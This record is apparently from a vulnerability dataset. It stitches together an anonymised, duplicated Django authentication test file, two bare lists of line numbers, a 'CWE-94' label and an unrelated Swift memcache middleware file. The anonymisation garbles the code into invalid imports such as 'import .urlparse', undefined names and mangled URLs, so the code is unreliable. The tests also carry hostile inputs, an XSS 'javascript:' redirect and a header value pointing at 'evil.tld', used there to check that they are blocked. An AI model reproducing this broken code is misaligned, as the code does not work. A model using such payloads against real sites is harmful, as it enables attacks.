self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/custom_query/?follow=/somewhere/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/named/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
self.confirm_logged_out()
def FUNC_38(self, VAR_2='password'):
VAR_26 = reverse('logout')
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
VAR_30 = '%(VAR_5)s?%(next)s=%(bad_url)s' % {
'url': VAR_26,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
self.login()
VAR_3 = self.client.get(VAR_30)
self.assertEqual(VAR_3.status_code, 302)
self.assertFalse(bad_url in VAR_3.url,
"%s should be blocked" % bad_url)
self.confirm_logged_out()
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/VAR_5%20with%20spaces/'): # see ticket #12534
VAR_31 = '%(VAR_5)s?%(next)s=%(good_url)s' % {
'url': VAR_26,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
self.login()
VAR_3 = self.client.get(VAR_31)
self.assertEqual(VAR_3.status_code, 302)
self.assertTrue(good_url in VAR_3.url,
"%s should be allowed" % good_url)
self.confirm_logged_out()
@skipIfCustomUser
@override_settings(
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class CLASS_9(CLASS_0):
VAR_1 = 'django.contrib.auth.tests.urls_admin'
def FUNC_61(self):
User.objects.filter(username='testclient').update(is_staff=True, is_superuser=True)
self.login()
self.admin = User.objects.get(pk=1)
def FUNC_62(self, VAR_9):
return {
'username': VAR_9.username,
'password': VAR_9.password,
'email': VAR_9.email,
'is_active': VAR_9.is_active,
'is_staff': VAR_9.is_staff,
'is_superuser': VAR_9.is_superuser,
'last_login_0': VAR_9.last_login.strftime('%Y-%m-%d'),
'last_login_1': VAR_9.last_login.strftime('%H:%M:%S'),
'initial-last_login_0': VAR_9.last_login.strftime('%Y-%m-%d'),
'initial-last_login_1': VAR_9.last_login.strftime('%H:%M:%S'),
'date_joined_0': VAR_9.date_joined.strftime('%Y-%m-%d'),
'date_joined_1': VAR_9.date_joined.strftime('%H:%M:%S'),
'initial-date_joined_0': VAR_9.date_joined.strftime('%Y-%m-%d'),
'initial-date_joined_1': VAR_9.date_joined.strftime('%H:%M:%S'),
'first_name': VAR_9.first_name,
'last_name': VAR_9.last_name,
}
def FUNC_63(self):
with patch_logger('django.security.DisallowedModelAdminLookup', 'error') as logger_calls:
VAR_3 = self.client.get('/admin/auth/VAR_9/?password__startswith=sha1$')
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(logger_calls), 1)
def FUNC_64(self):
VAR_27 = self.get_user_data(self.admin)
VAR_27['email'] = 'new_' + VAR_27['email']
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/' % self.admin.pk, VAR_27)
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/')
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'Changed VAR_8.')
def FUNC_65(self):
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/' % self.admin.pk,
self.get_user_data(self.admin)
)
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/')
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'No VAR_11 changed.')
def FUNC_66(self):
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/VAR_2/' % self.admin.pk, {
'password1': 'password1',
'password2': 'password1',
})
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/%s/' % self.admin.pk)
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'Changed VAR_2.')
self.logout()
self.login(VAR_2='password1')
| import itertools
import os
import re
try:
from urllib.parse import .urlparse, ParseResult
except ImportError: # Python 2
from urlparse import .urlparse, ParseResult
from django.conf import global_settings, VAR_23
from django.contrib.sites.models import Site, RequestSite
from django.contrib.admin.models import LogEntry
from django.contrib.auth.models import User
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import QueryDict, HttpRequest
from django.utils.encoding import force_text
from django.utils.http import .urlquote
from django.utils._os import .upath
from django.test import TestCase
from django.test.utils import override_settings, patch_logger
from django.middleware.csrf import CsrfViewMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import (AuthenticationForm, PasswordChangeForm,
SetPasswordForm)
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.contrib.auth.views import .login as login_view
@override_settings(
LANGUAGES=(
('en', 'English'),
),
LANGUAGE_CODE='en',
TEMPLATE_LOADERS=global_settings.TEMPLATE_LOADERS,
TEMPLATE_DIRS=(
os.path.join(os.path.dirname(upath(__file__)), 'templates'),
),
USE_TZ=False,
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class CLASS_0(TestCase):
VAR_0 = ['authtestdata.json']
VAR_1 = 'django.contrib.auth.tests.urls'
def FUNC_0(self, VAR_2='password'):
VAR_3 = self.client.post('/FUNC_0/', {
'username': 'testclient',
'password': VAR_2,
})
self.assertTrue(SESSION_KEY in self.client.session)
return VAR_3
def FUNC_1(self):
VAR_3 = self.client.get('/admin/FUNC_1/')
self.assertEqual(VAR_3.status_code, 200)
self.assertTrue(SESSION_KEY not in self.client.session)
def FUNC_2(self, VAR_3, VAR_4):
VAR_10 = list(itertools.chain(*VAR_3.context['form'].errors.values()))
self.assertIn(force_text(VAR_4), VAR_10)
def FUNC_3(self, VAR_5, VAR_6, VAR_7=False):
VAR_11 = ParseResult._fields
for attr, VAR_32, VAR_33 in zip(VAR_11, urlparse(VAR_5), urlparse(VAR_6)):
if VAR_7 and attr == 'query':
VAR_32, VAR_33 = QueryDict(VAR_32), QueryDict(VAR_33)
if VAR_32 and VAR_33 and VAR_32 != VAR_33:
self.fail("%r != %r (%s doesn't match)" % (VAR_5, VAR_6, attr))
@skipIfCustomUser
class CLASS_1(CLASS_0):
VAR_1 = 'django.contrib.auth.urls'
VAR_12 = [
('login', [], {}),
('logout', [], {}),
('password_change', [], {}),
('password_change_done', [], {}),
('password_reset', [], {}),
('password_reset_done', [], {}),
('password_reset_confirm', [], {
'uidb64': 'aaaaaaa',
'token': '1111-aaaaa',
}),
('password_reset_complete', [], {}),
]
for name, args, kwargs in VAR_12:
try:
reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.fail("Reversal of VAR_5 named '%s' failed with NoReverseMatch" % name)
@skipIfCustomUser
class CLASS_2(CLASS_0):
def FUNC_5(self):
VAR_3 = self.client.get('/password_reset/')
self.assertEqual(VAR_3.status_code, 200)
VAR_3 = self.client.post('/password_reset/', {'email': 'not_a_real_email@VAR_8.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 0)
VAR_3 = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://" in mail.outbox[0].body)
self.assertEqual(VAR_23.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
self.assertFalse(mail.outbox[0].message().is_multipart())
def FUNC_7(self):
VAR_3 = self.client.post('/password_reset/html_email_template/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
VAR_13 = mail.outbox[0].message()
self.assertEqual(len(VAR_13.get_payload()), 2)
self.assertTrue(VAR_13.is_multipart())
self.assertEqual(VAR_13.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(VAR_13.get_payload(1).get_content_type(), 'text/html')
self.assertTrue('<html>' not in VAR_13.get_payload(0).get_payload())
self.assertTrue('<html>' in VAR_13.get_payload(1).get_payload())
VAR_3 = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)
VAR_3 = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='adminsite.com'
)
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://adminsite.com" in mail.outbox[0].body)
self.assertEqual(VAR_23.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
VAR_3 = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
VAR_3 = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
def FUNC_12(self):
self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def FUNC_13(self, VAR_8):
VAR_14 = re.search(r"https?://[^/]*(/.*reset/\S*)", VAR_8.body)
self.assertTrue(VAR_14 is not None, "No URL found in sent email")
return VAR_14.group(), VAR_14.groups()[0]
def FUNC_14(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "Please enter your new password")
def FUNC_15(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path[:-5] + ("0" * 4) + VAR_15[-1]
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_16(self):
VAR_3 = self.client.get('/reset/123456/1-1/')
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_17(self):
VAR_3 = self.client.get('/reset/zzzzzzzzzzzzz/1-1/')
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_18(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path[:-5] + ("0" * 4) + VAR_15[-1]
self.client.post(VAR_15, {
'new_password1': 'anewpassword',
'new_password2': ' anewpassword',
})
VAR_16 = User.objects.get(VAR_8='staffmember@example.com')
self.assertTrue(not VAR_16.check_password("anewpassword"))
def FUNC_19(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
VAR_16 = User.objects.get(VAR_8='staffmember@example.com')
self.assertTrue(VAR_16.check_password("anewpassword"))
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_20(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'x'})
self.assertFormError(VAR_3, SetPasswordForm.error_messages['password_mismatch'])
def FUNC_21(self):
VAR_3 = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/done/')
def FUNC_22(self):
VAR_3 = self.client.post('/password_reset/custom_redirect/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_23(self):
VAR_3 = self.client.post('/password_reset/custom_redirect/named/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
def FUNC_24(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/reset/done/')
def FUNC_25(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path.replace('/reset/', '/reset/custom/')
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_26(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path.replace('/reset/', '/reset/custom/named/')
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
class CLASS_3(CLASS_0):
VAR_0 = ['custom_user.json']
def FUNC_12(self):
VAR_3 = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def FUNC_13(self, VAR_8):
VAR_14 = re.search(r"https?://[^/]*(/.*reset/\S*)", VAR_8.body)
self.assertTrue(VAR_14 is not None, "No URL found in sent email")
return VAR_14.group(), VAR_14.groups()[0]
def FUNC_27(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "Please enter your new password")
@skipIfCustomUser
class CLASS_4(CLASS_0):
def FUNC_28(self, VAR_2='password'):
VAR_3 = self.client.post('/FUNC_0/', {
'username': 'testclient',
'password': VAR_2,
})
self.assertFormError(VAR_3, AuthenticationForm.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
})
def FUNC_1(self):
self.client.get('/FUNC_1/')
def FUNC_29(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'donuts',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertFormError(VAR_3, PasswordChangeForm.error_messages['password_incorrect'])
def FUNC_30(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'donuts',
})
self.assertFormError(VAR_3, SetPasswordForm.error_messages['password_mismatch'])
def FUNC_31(self):
self.login()
self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.fail_login()
self.login(VAR_2='password1')
def FUNC_32(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_change/done/')
@override_settings(LOGIN_URL='/FUNC_0/')
def FUNC_33(self):
VAR_3 = self.client.get('/password_change/done/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/?next=/password_change/done/')
def FUNC_34(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_change/done/')
def FUNC_35(self):
self.login()
VAR_3 = self.client.post('/password_change/custom/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_36(self):
self.login()
VAR_3 = self.client.post('/password_change/custom/named/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
@skipIfCustomUser
class CLASS_5(CLASS_0):
def FUNC_37(self):
VAR_3 = self.client.get(reverse('login'))
self.assertEqual(VAR_3.status_code, 200)
if Site._meta.installed:
VAR_29 = Site.objects.get_current()
self.assertEqual(VAR_3.context['site'], VAR_29)
self.assertEqual(VAR_3.context['site_name'], VAR_29.name)
else:
self.assertIsInstance(VAR_3.context['site'], RequestSite)
self.assertTrue(isinstance(VAR_3.context['form'], AuthenticationForm),
'Login form is not an AuthenticationForm')
def FUNC_38(self, VAR_2='password'):
VAR_17 = reverse('login')
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com',
'javascript:alert("XSS")'):
VAR_30 = '%(VAR_5)s?%(next)s=%(bad_url)s' % {
'url': VAR_17,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
VAR_3 = self.client.post(VAR_30, {
'username': 'testclient',
'password': VAR_2,
})
self.assertEqual(VAR_3.status_code, 302)
self.assertFalse(bad_url in VAR_3.url,
"%s should be blocked" % bad_url)
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'HTTPS:///',
'//testserver/',
'/VAR_5%20with%20spaces/'): # see ticket #12534
VAR_31 = '%(VAR_5)s?%(next)s=%(good_url)s' % {
'url': VAR_17,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
VAR_3 = self.client.post(VAR_31, {
'username': 'testclient',
'password': VAR_2,
})
self.assertEqual(VAR_3.status_code, 302)
self.assertTrue(good_url in VAR_3.url,
"%s should be allowed" % good_url)
def FUNC_39(self):
self.client.post('/custom_requestauth_login/', {
'username': 'testclient',
'password': 'password',
}, follow=True)
def FUNC_40(self, VAR_2='password'):
VAR_18 = HttpRequest()
CsrfViewMiddleware().process_view(VAR_18, login_view, (), {})
VAR_18.META["CSRF_COOKIE_USED"] = True
VAR_19 = login_view(VAR_18)
VAR_20 = CsrfViewMiddleware().process_response(VAR_18, VAR_19)
VAR_21 = VAR_20.cookies.get(VAR_23.CSRF_COOKIE_NAME, None)
VAR_22 = VAR_21.coded_value
VAR_18 = HttpRequest()
VAR_18.COOKIES[VAR_23.CSRF_COOKIE_NAME] = VAR_22
VAR_18.method = "POST"
VAR_18.POST = {'username': 'testclient', 'password': VAR_2, 'csrfmiddlewaretoken': VAR_22}
VAR_18.REQUEST = VAR_18.POST
SessionMiddleware().process_request(VAR_18)
CsrfViewMiddleware().process_view(VAR_18, login_view, (), {})
VAR_18.META["SERVER_NAME"] = "testserver" # Required to have redirect work in FUNC_0 view
VAR_18.META["SERVER_PORT"] = 80
VAR_18.META["CSRF_COOKIE_USED"] = True
VAR_19 = login_view(VAR_18)
VAR_20 = CsrfViewMiddleware().process_response(VAR_18, VAR_19)
VAR_21 = VAR_20.cookies.get(VAR_23.CSRF_COOKIE_NAME, None)
VAR_24 = VAR_21.coded_value
self.assertNotEqual(VAR_22, VAR_24)
@skipIfCustomUser
class CLASS_6(CLASS_0):
def FUNC_41(self, VAR_5, VAR_7=False):
VAR_3 = self.client.get('/login_required/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, VAR_5, VAR_7=parse_qs)
@override_settings(LOGIN_URL='/FUNC_0/')
def FUNC_42(self):
self.assertLoginURLEquals('/FUNC_0/?next=/login_required/')
@override_settings(LOGIN_URL='login')
def FUNC_43(self):
self.assertLoginURLEquals('/FUNC_0/?next=/login_required/')
@override_settings(LOGIN_URL='http://remote.example.com/login')
def FUNC_44(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'http://remote.example.com/FUNC_0?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@override_settings(LOGIN_URL='https:///FUNC_0/')
def FUNC_45(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'https:///FUNC_0/?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@override_settings(LOGIN_URL='/FUNC_0/?pretty=1')
def FUNC_46(self):
self.assertLoginURLEquals('/FUNC_0/?pretty=1&next=/login_required/', VAR_7=True)
@override_settings(LOGIN_URL='http://remote.example.com/FUNC_0/?next=/default/')
def FUNC_47(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'http://remote.example.com/FUNC_0/?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@skipIfCustomUser
class CLASS_7(CLASS_0):
def FUNC_48(self, VAR_5):
VAR_3 = self.login()
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, VAR_5)
def FUNC_49(self):
self.assertLoginRedirectURLEqual('/accounts/profile/')
@override_settings(LOGIN_REDIRECT_URL='/custom/')
def FUNC_50(self):
self.assertLoginRedirectURLEqual('/custom/')
@override_settings(LOGIN_REDIRECT_URL='password_reset')
def FUNC_51(self):
self.assertLoginRedirectURLEqual('/password_reset/')
@override_settings(LOGIN_REDIRECT_URL='http://remote.example.com/welcome/')
def FUNC_52(self):
self.assertLoginRedirectURLEqual('http://remote.example.com/welcome/')
@skipIfCustomUser
class CLASS_8(CLASS_0):
def FUNC_53(self):
self.assertTrue(SESSION_KEY not in self.client.session)
self.login()
VAR_3 = self.client.get('/FUNC_1/')
self.assertContains(VAR_3, 'Logged out')
self.confirm_logged_out()
def FUNC_55(self):
self.login()
VAR_3 = self.client.get('/FUNC_1/')
self.assertTrue('site' in VAR_3.context)
def FUNC_56(self):
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
VAR_3 = self.client.get('/FUNC_1/next_page/?next=/FUNC_0/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/?next=/FUNC_0/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/custom_query/?follow=/somewhere/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/named/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
self.confirm_logged_out()
def FUNC_38(self, VAR_2='password'):
VAR_26 = reverse('logout')
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com',
'javascript:alert("XSS")'):
VAR_30 = '%(VAR_5)s?%(next)s=%(bad_url)s' % {
'url': VAR_26,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
self.login()
VAR_3 = self.client.get(VAR_30)
self.assertEqual(VAR_3.status_code, 302)
self.assertFalse(bad_url in VAR_3.url,
"%s should be blocked" % bad_url)
self.confirm_logged_out()
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'HTTPS:///',
'//testserver/',
'/VAR_5%20with%20spaces/'): # see ticket #12534
VAR_31 = '%(VAR_5)s?%(next)s=%(good_url)s' % {
'url': VAR_26,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
self.login()
VAR_3 = self.client.get(VAR_31)
self.assertEqual(VAR_3.status_code, 302)
self.assertTrue(good_url in VAR_3.url,
"%s should be allowed" % good_url)
self.confirm_logged_out()
@skipIfCustomUser
@override_settings(
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class CLASS_9(CLASS_0):
VAR_1 = 'django.contrib.auth.tests.urls_admin'
def FUNC_61(self):
User.objects.filter(username='testclient').update(is_staff=True, is_superuser=True)
self.login()
self.admin = User.objects.get(pk=1)
def FUNC_62(self, VAR_9):
return {
'username': VAR_9.username,
'password': VAR_9.password,
'email': VAR_9.email,
'is_active': VAR_9.is_active,
'is_staff': VAR_9.is_staff,
'is_superuser': VAR_9.is_superuser,
'last_login_0': VAR_9.last_login.strftime('%Y-%m-%d'),
'last_login_1': VAR_9.last_login.strftime('%H:%M:%S'),
'initial-last_login_0': VAR_9.last_login.strftime('%Y-%m-%d'),
'initial-last_login_1': VAR_9.last_login.strftime('%H:%M:%S'),
'date_joined_0': VAR_9.date_joined.strftime('%Y-%m-%d'),
'date_joined_1': VAR_9.date_joined.strftime('%H:%M:%S'),
'initial-date_joined_0': VAR_9.date_joined.strftime('%Y-%m-%d'),
'initial-date_joined_1': VAR_9.date_joined.strftime('%H:%M:%S'),
'first_name': VAR_9.first_name,
'last_name': VAR_9.last_name,
}
def FUNC_63(self):
with patch_logger('django.security.DisallowedModelAdminLookup', 'error') as logger_calls:
VAR_3 = self.client.get('/admin/auth/VAR_9/?password__startswith=sha1$')
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(logger_calls), 1)
def FUNC_64(self):
VAR_27 = self.get_user_data(self.admin)
VAR_27['email'] = 'new_' + VAR_27['email']
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/' % self.admin.pk, VAR_27)
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/')
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'Changed VAR_8.')
def FUNC_65(self):
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/' % self.admin.pk,
self.get_user_data(self.admin)
)
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/')
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'No VAR_11 changed.')
def FUNC_66(self):
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/VAR_2/' % self.admin.pk, {
'password1': 'password1',
'password2': 'password1',
})
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/%s/' % self.admin.pk)
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'Changed VAR_2.')
self.logout()
self.login(VAR_2='password1')
| [
8,
23,
29,
30,
49,
57,
62,
67,
78,
84,
85,
89,
110,
111,
114,
123,
131,
132,
134,
150,
157,
169,
170,
174,
175,
176,
177,
178,
179,
180,
189,
190,
202,
203,
205,
209,
214,
218,
220,
223,
224,
226,
229,
231,
234,
236,
239,
241,
242,
245,
250,
253,
258,
261,
262,
265,
271,
277,
283,
289,
296,
304,
312,
313,
317,
319,
324,
329,
333,
335,
336,
339,
348,
351,
360,
369,
379,
389,
395,
405,
415,
425,
426,
429,
441,
444,
445,
450,
463,
464,
484,
486,
491,
492,
493,
498,
499,
507,
508,
514,
515,
525,
526,
528,
529,
537,
541,
545,
551,
557,
561,
567,
568,
576,
579,
583,
587,
591,
592,
595,
598,
605,
607,
611,
613,
618,
622,
624,
632,
640,
648,
656,
659,
660,
676,
677,
696,
703,
705,
709,
729,
730,
731,
733,
738,
746,
754,
765,
44,
45,
46,
532,
571,
64,
69,
70,
71,
72,
73,
74,
75,
76,
90,
91,
116,
117,
124,
125,
136,
137,
138,
139,
151,
152,
158,
159,
160,
171,
172,
173,
191,
192,
193,
495,
496,
497,
599,
600,
625,
626,
633,
634,
641,
642,
649,
650
] | [
8,
23,
29,
30,
49,
57,
62,
67,
78,
84,
85,
89,
110,
111,
114,
123,
131,
132,
134,
150,
157,
169,
170,
174,
175,
176,
177,
178,
179,
180,
189,
190,
202,
203,
205,
209,
214,
218,
220,
223,
224,
226,
229,
231,
234,
236,
239,
241,
242,
245,
250,
253,
258,
261,
262,
265,
271,
277,
283,
289,
296,
304,
312,
313,
317,
319,
324,
329,
333,
335,
336,
339,
348,
351,
360,
369,
379,
389,
395,
405,
415,
425,
426,
429,
441,
444,
445,
451,
464,
465,
486,
488,
493,
494,
495,
500,
501,
509,
510,
516,
517,
527,
528,
530,
531,
539,
543,
547,
553,
559,
563,
569,
570,
578,
581,
585,
589,
593,
594,
597,
600,
607,
609,
613,
615,
620,
624,
626,
634,
642,
650,
658,
661,
662,
679,
680,
700,
707,
709,
713,
733,
734,
735,
737,
742,
750,
758,
769,
44,
45,
46,
534,
573,
64,
69,
70,
71,
72,
73,
74,
75,
76,
90,
91,
116,
117,
124,
125,
136,
137,
138,
139,
151,
152,
158,
159,
160,
171,
172,
173,
191,
192,
193,
497,
498,
499,
601,
602,
627,
628,
635,
636,
643,
644,
651,
652
] |
5CWE-94
| # Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ConfigParser import ConfigParser, NoSectionError, NoOptionError
from swift.common.memcached import MemcacheRing
class MemcacheMiddleware(object):
"""
Caching middleware that manages caching in swift.
"""
def __init__(self, app, conf):
self.app = app
self.memcache_servers = conf.get('memcache_servers')
if not self.memcache_servers:
path = os.path.join(conf.get('swift_dir', '/etc/swift'),
'memcache.conf')
memcache_conf = ConfigParser()
if memcache_conf.read(path):
try:
self.memcache_servers = \
memcache_conf.get('memcache', 'memcache_servers')
except (NoSectionError, NoOptionError):
pass
if not self.memcache_servers:
self.memcache_servers = '127.0.0.1:11211'
self.memcache = MemcacheRing(
[s.strip() for s in self.memcache_servers.split(',') if s.strip()])
def __call__(self, env, start_response):
env['swift.cache'] = self.memcache
return self.app(env, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def cache_filter(app):
return MemcacheMiddleware(app, conf)
return cache_filter
